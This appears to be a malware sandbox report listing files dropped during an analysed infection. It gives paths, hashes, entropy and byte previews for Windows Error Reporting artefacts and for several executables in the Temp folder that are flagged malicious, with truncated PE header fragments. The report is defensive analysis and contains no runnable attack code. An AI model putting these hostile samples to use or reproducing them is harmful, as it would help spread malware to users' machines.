SHA-512: 3AD8085642AB1655D958F37C3E0E0DCA86911047587D74A31B8A5E152AA3854BD8E41CC9074F4481444F0B170DD69CF1B184E7D0F26D414EA87F3CF9EC50AE8F
Malicious: false
Reputation: unknown
                                                                                                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.6.6.9.6.7.1.1.6.5.9.9.5.2.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.6.6.9.6.7.2.8.0.1.9.3.7.0.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.2.5.7.b.a.b.9.-.4.c.8.a.-.4.4.1.d.-.8.5.3.c.-.8.7.b.3.5.1.1.7.8.c.0.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.8.c.c.4.2.1.3.-.8.3.c.d.-.4.4.a.a.-.b.4.9.1.-.5.a.a.9.6.6.d.8.2.f.4.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.B.1.B.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.0.c.-.0.0.0.1.-.0.0.1.6.-.6.6.7.3.-.e.6.7.2.c.d.0.9.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.4.3.2.a.e.1.c.8.6.8.c.9.6.1.2.8.e.c.a.0.4.a.e.4.c.5.4.4.7.e.6.0.0.0.0.2.9.0.1.!.0.0.0.0.5.9.9.5.a.e.9.d.0.2.4.7.0.3.6.c.c.6.d.3.e.a.7.4.1.e.7.5.0.4.c.9.1.3.f.1.f.b.7.6.!.B.1.B.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.1.1././.1.2.:.
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1914.tmp.csv
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 49372
Entropy (8bit): 3.067630685633625
Encrypted: false
SSDEEP: 1536:SrHbYM8XsdtCvsOVnMZFRInPK/AyqP0b5Nt6:SrHbYM8XsdtCvsOVnMZFRIPK/AyqP0bg
MD5: 338F750C272EF10F787C1E43F7469E7C
SHA1: 6BAD6258FA53FAC05D2F096E899F246786E4A3F0
SHA-256: 4A99A6B112F2BC0F1B2EE04E5A0E555EBCC6685B1F3735577DBD42D6FBE86085
SHA-512: E7D72CBE85F51D6D393F3EDCFD3518CCD7C5254A6DA052111D957B0644BBB75AB5FF978E9A7B9300D71FEDE41D288BB64931E8F906F5836464558E6978124598
Malicious: false
Reputation: unknown
                                                                                                                      Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER20E5.tmp.txt
                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):13340
                                                                                                                      Entropy (8bit):2.6954899185007766
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:9GiZYW+L4ZOtYzYIfRWLEH9UYEZJsJtMifFSySwmM7azdv30JiIU83:9jZD+fUlKscaazd/0JFU83
                                                                                                                      MD5:7C2AA9B20C71B8DD577514C4DDBBD712
                                                                                                                      SHA1:463B97C6A6F96546361BF21B6317E9293607FA2F
                                                                                                                      SHA-256:8C1BF6329AB684529639CC05DBF3B1780CF840DC68291086737CB14EAD142A10
                                                                                                                      SHA-512:1093A857D78BD1CEC600A6B6DBD50166CB7CEC200129E3A88F877AE91B1A92F148B5946E8FEE0FC3E9DC6D388CE9F5639DDCD4B58EEF98AFB9F61DCE93C37903
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER472.tmp.WERInternalMetadata.xml
                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):8390
                                                                                                                      Entropy (8bit):3.700501604073412
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:Rrl7r3GLNiLe696YIhSUFEgmfIRSHCpDg89bo2HlsfIYm:RrlsNiS696YeSUGgmfIRSao/f+
                                                                                                                      MD5:4B651050CA6DE05729DB037C8478C51F
                                                                                                                      SHA1:0BF9C319562E7CC3201B2DED04AAD2231E896310
                                                                                                                      SHA-256:AD3B556FE1FE1665E2FE34EC93BA192963A2E9CDA8BC79E0CA94B61A97D2B727
                                                                                                                      SHA-512:28A03C0F8399AA0F8A121B51EAAA0E5CCC6530AA3015959673B489CD3847CC89105A6E82D766C1C6F6379B60D71A4EBB5C8700D651B0BC162181E9447FEF147B
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.2.4.<./.P.i.d.>.......
                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERB49.tmp.xml
                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):4685
                                                                                                                      Entropy (8bit):4.473771438286213
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:cvIwSD8zsLJgtWI9IOWSC8BJG8fm8M4JHl8qFBD4+q8vX8p5PnzmdU1d:uITfljvSNzDJH7EKu5PnCdU1d
                                                                                                                      MD5:CF08C1DE42859C20B2D34A25654CB927
                                                                                                                      SHA1:08723BDD9572112FF16270CC766085C89148915D
                                                                                                                      SHA-256:C480A9FF150CBDE8804F51B4264A3213697E2614F04CE506BB11A2C34BE377FB
                                                                                                                      SHA-512:5043BB5B3A08FFC31FFCACCF95D3641A88708C05C2AD3E5FC37B08E92CDBA171BA9EFBA39D8D78C3405FA8C15EC4B8471611663D5A27FE445418A923DC48A627
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1342935" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERBA77.tmp.csv
                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):51858
                                                                                                                      Entropy (8bit):3.0616433192144115
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:jLHv5WmtKiTdiIMZN+fNz0Ehs9WKTebyqbp:jLHv5WmtKiTdiIMZN+fx0Ehs9WKTebyG
                                                                                                                      MD5:74A2DA0D08295658AA1F0293F6EADF2E
                                                                                                                      SHA1:0C6C053599986E8D921BEEA9FE16EF324FB39CC4
                                                                                                                      SHA-256:00D32A923A24EDE8F79E33C2E661F32AD3D903EDBE6C4B2D24A9344840782DE7
                                                                                                                      SHA-512:24C2574F4AC293E82DCFA458C2C671BCE4D3CC2FC8AF56554C8A772CA83F89F9C4A16083CAA2A40D6A6C3AEAAAA90B8209158D9FC50F4ED93864869042B40D5F
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERBEED.tmp.txt
                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):13340
                                                                                                                      Entropy (8bit):2.695534489993445
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:9GiZYWztLC0YZYHWlKbfHCUYEZlot0iXFjKVw5/4ZidaWXHBJrXIsJ3:9jZDVO7Y2JdaWXHBJr4sJ3
                                                                                                                      MD5:25F7F1558464C00B4E4D702D387DA442
                                                                                                                      SHA1:3240050B847D2BFCB21F9C7F866FA8488C98C37C
                                                                                                                      SHA-256:AAA81A7419C4ED2C6E75EC2BE1C2DEBF54550E1F8B97352416130C7ED4290C9D
                                                                                                                      SHA-512:F7F6CF719652058B24450EF387F149614AD950FDA2ADFD3418BDA3951B33A639461864E7E81292B87F327789101C2C25203D0D0C1F7A5499CE4303217AA2FA6C
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERFA10.tmp.dmp
                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      File Type:Mini DuMP crash report, 14 streams, Sat Jan 15 05:05:13 2022, 0x1205a4 type
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):42152
                                                                                                                      Entropy (8bit):1.9990135190542404
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:TcGeH/iNOeh0wVM6/7wJ8EpwLkSjtUHpKxTHtE1W:WHeLsxyLFEsdu1W
                                                                                                                      MD5:51E48C78778D421A4C28C21DF4E8DEEF
                                                                                                                      SHA1:E1B678DFFCAEB6074ED6C741457D3B6FFD198BB8
                                                                                                                      SHA-256:F8B2510CC073E240F4FA3588B5D06DECB7C7FFEEDD9B09E3715D06A82EC5E098
                                                                                                                      SHA-512:1BB92EF8DDF4137C261C73562E177FF1F5FBA83AE7720846C000777C36FE9C88C1082897051CB95E8BDF88A340CBA92BCE925164705BA687BC87CC204F98EF95
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MDMP....... ........V.a....................................4...v(..........T.......8...........T...........................x...........d....................................................................U...........B..............GenuineIntelW...........T............U.a.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\3BC6.exe.log
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\3BC6.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):700
                                                                                                                      Entropy (8bit):5.346524082657112
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhat/DLI4M/DLI4M0kvoDLIw:ML9E4Ks2wKDE4KhK3VZ9pKhgLE4qE4jv
                                                                                                                      MD5:65CF801545098D915A06D8318D296A01
                                                                                                                      SHA1:456149D5142C75C4CF74D4A11FF400F68315EBD0
                                                                                                                      SHA-256:32E502D76DBE4F89AEE586A740F8D1CBC112AA4A14D43B9914C785550CCA130F
                                                                                                                      SHA-512:4D1FF469B62EB5C917053418745CCE4280052BAEF9371CAFA5DA13140A16A7DE949DD1581395FF838A790FFEBF85C6FC969A93CC5FF2EEAB8C6C4A9B4F1D552D
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                                                      C:\Users\user\AppData\Local\Temp\2473.exe
                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):7336391
                                                                                                                      Entropy (8bit):7.993025428513385
                                                                                                                      Encrypted:true
                                                                                                                      SSDEEP:196608:76+hvICteEroXxqENE+sKsXXgvkz+AlnhMCRKsAN2aL:DInEroXjsKkXgsCMhkrNF
                                                                                                                      MD5:CBE604877A46CEEBA112802BC17FFEF8
                                                                                                                      SHA1:E85AB4CCBE491348C39F751162FFF71A90643ECA
                                                                                                                      SHA-256:32703A3D88B3E9B8FE1A64FD1CBCC0925FC2C74BCBDEFBBD6944CBFAD0029FEC
                                                                                                                      SHA-512:86F3946B813FB457D95B6635FA308DA1BF5F2C0FBD5BDCA75F7776D1A01A2D3C67A8A9E268DCC145FF575D70FBE84BE9BEB112A0D2269B955795C74468C00598
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'X.8c9.kc9.kc9.kwR.jh9.kwR.jd9.kwR.j.9.k.V#kg9.k1L.jE9.k1L.jr9.k1L.jj9.kwR.jh9.kc9.k.9.k.L.jp9.k.L.jb9.kRichc9.k................PE..d...Q..a.........."......6...T................@......................................p...`..................................................[..x...............................H... 9..............................@9..8............P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data........p.......T..............@....pdata...............`..............@..@_RDATA...............~..............@..@.rsrc...............................@..@.reloc..H...........................@..B........................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Local\Temp\254E.exe
                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):324096
                                                                                                                      Entropy (8bit):6.7085322399040335
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:7YHQmo4o6MLYuiQagdEmekrti+RUgf8pbdv:7oQLRPEQLFnrlRt8pJ
                                                                                                                      MD5:41AB3EFA04441E560A279BD0F7C0503D
                                                                                                                      SHA1:36498DB70D79BC77FD1D8C9543457BA467486D77
                                                                                                                      SHA-256:5CE3B77E18533D7FC98C430034D5F384D81289FD28E3E9FF7DB248EB508F8002
                                                                                                                      SHA-512:735CA627FFD1E4581854B3F8D1777AAD86A1BFBEE975C46F021EE1E2C19547EF84F498ADD85705B9B8BB24BCBE143AEDDEF31CBAB9D343D264AD2FF4C188832B
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.9.)~W.)~W.)~W.7,..3~W.7,..~W...,..~W.)~V..~W.7,...~W.7,..(~W.7,..(~W.Rich)~W.........PE..L......`..........................................@.............................................................................P.......(........................................................... ...@...............L............................text............................... ..`.data...............................@....wuxut..............................@....tijayu.............................@....zemoyi.............................@....rsrc...(............"..............@..@.reloc..dF.......H..................@..B................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Local\Temp\2F32.exe
                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):54272
                                                                                                                      Entropy (8bit):4.125149292696976
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:s7yxMfjf6NrLqKZ6mXS9LzL1pvULIRPqY2F3991ZuBhyY8PGCz9QwAOSZCGQyBbf:KyufjSLq86mXS9LzLdqY2LHZ4cZA
                                                                                                                      MD5:1B1E4286625BB189A526E910F2031C7B
                                                                                                                      SHA1:650C0550F12C65D9841D10AB589FF39261018957
                                                                                                                      SHA-256:C9D7CB68DEC80469C3C03B0E90C7AF1972462CA7779424DB3BFD9D44AEBAA624
                                                                                                                      SHA-512:68F2366606B658FDDB2B5E9BAE2E6931FB455A230F8A4813EACB38A3D7853B9640F46FE9EE6FFD9862A509558B66C30A3494CB7231C3EF7CD784950771273155
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....vL..........."...0..............5... ...@....@.. ....................... ............@..................................4..O....@..\............................4............................................... ............... ..H............text........ ...................... ..`.rsrc...\....@......................@..@.reloc..............................@..B.................4......H........#..`............3...............................................0..:........(.......(....(.....s......o.....(.......(....(.......+..*".(.....*..0............ ...(....r...p......%.."...(.....(...........%. N..."....o....&. ....(........&.....&...(....r...pr5..pr9..p(..........%..'...(.....(....s..........%.r;..p.o....t.....+..*........B..Q.......0..7.........(.............,.....i(.....(.....o....&s .....(....o!...o"....s#......o$.....+...(%.........o&...o'.......((..
                                                                                                                      C:\Users\user\AppData\Local\Temp\3136.exe
                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):321536
                                                                                                                      Entropy (8bit):6.690971316601855
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:7vrN0pZXR3Srrj51BawxgIKP184NSWd2hQAjh3C:zrN0vR36TBHLY1JSWMQAt
                                                                                                                      MD5:023802260A0216012A5F00079406D967
                                                                                                                      SHA1:AC1B2B166216DE3D15552BCD23BEC03536AFE1A7
                                                                                                                      SHA-256:0B2E2469C995A8D8DAF14CD69EF8717590B538C8A5B432F8704079DB5CF03D04
                                                                                                                      SHA-512:589294C84150CFAC2830D58BC7BCA665FF86574417792BF7C02905924058F745F4D55CB12F01FB5C894A1964D2EF1009031FA598D6288CE581F22B7D19B01283
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.9.)~W.)~W.)~W.7,..3~W.7,..~W...,..~W.)~V..~W.7,...~W.7,..(~W.7,..(~W.Rich)~W.........PE..L.....}`..........................................@........................................................................4...P.......(........................................................... ...@...............L............................text............................... ..`.data...............................@....yocinoj............................@....lebe...............................@....wuno...............................@....rsrc...(...........................@..@.reloc..ZF.......H..................@..B................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Local\Temp\3A7E.exe
                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):3576320
                                                                                                                      Entropy (8bit):7.9976863291960605
                                                                                                                      Encrypted:true
                                                                                                                      SSDEEP:49152:Y+RSFqeQKgdJee+ntOkgd+TuRCg+687ZEYNFvKfDIcK8nAONaGGh:Yb8eQKg+tOV0T0z875NFKfDPK8nASA
                                                                                                                      MD5:5800952B83AECEFC3AA06CCB5B29A4C2
                                                                                                                      SHA1:DB51DDBDF8B5B1ABECD6CFAB36514985F357F7A8
                                                                                                                      SHA-256:B8BED0211974F32DB2C385350FB62954F0B0F335BC592B51144027956524D674
                                                                                                                      SHA-512:2A490708A2C5B742CEB14DE6E2180C4CB606FCCEB5F17DE69249CF532EDC37B984686B534A88AE861CC38471C5892785C26DA68C4F662959542458C583E77E38
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.................$...................@....@...........................S......!7.....................................|.N. .... M...................................................................................................................... ..........................@................0......................@................@...z..................@............ ...0......................@...........x+...P......................@.............1.........................@....rsrc........ M......L0.............@....28gybOo......N.......1.............@....adata.......pS.......6.............@...........................................................................................................................................................................................................................................................................
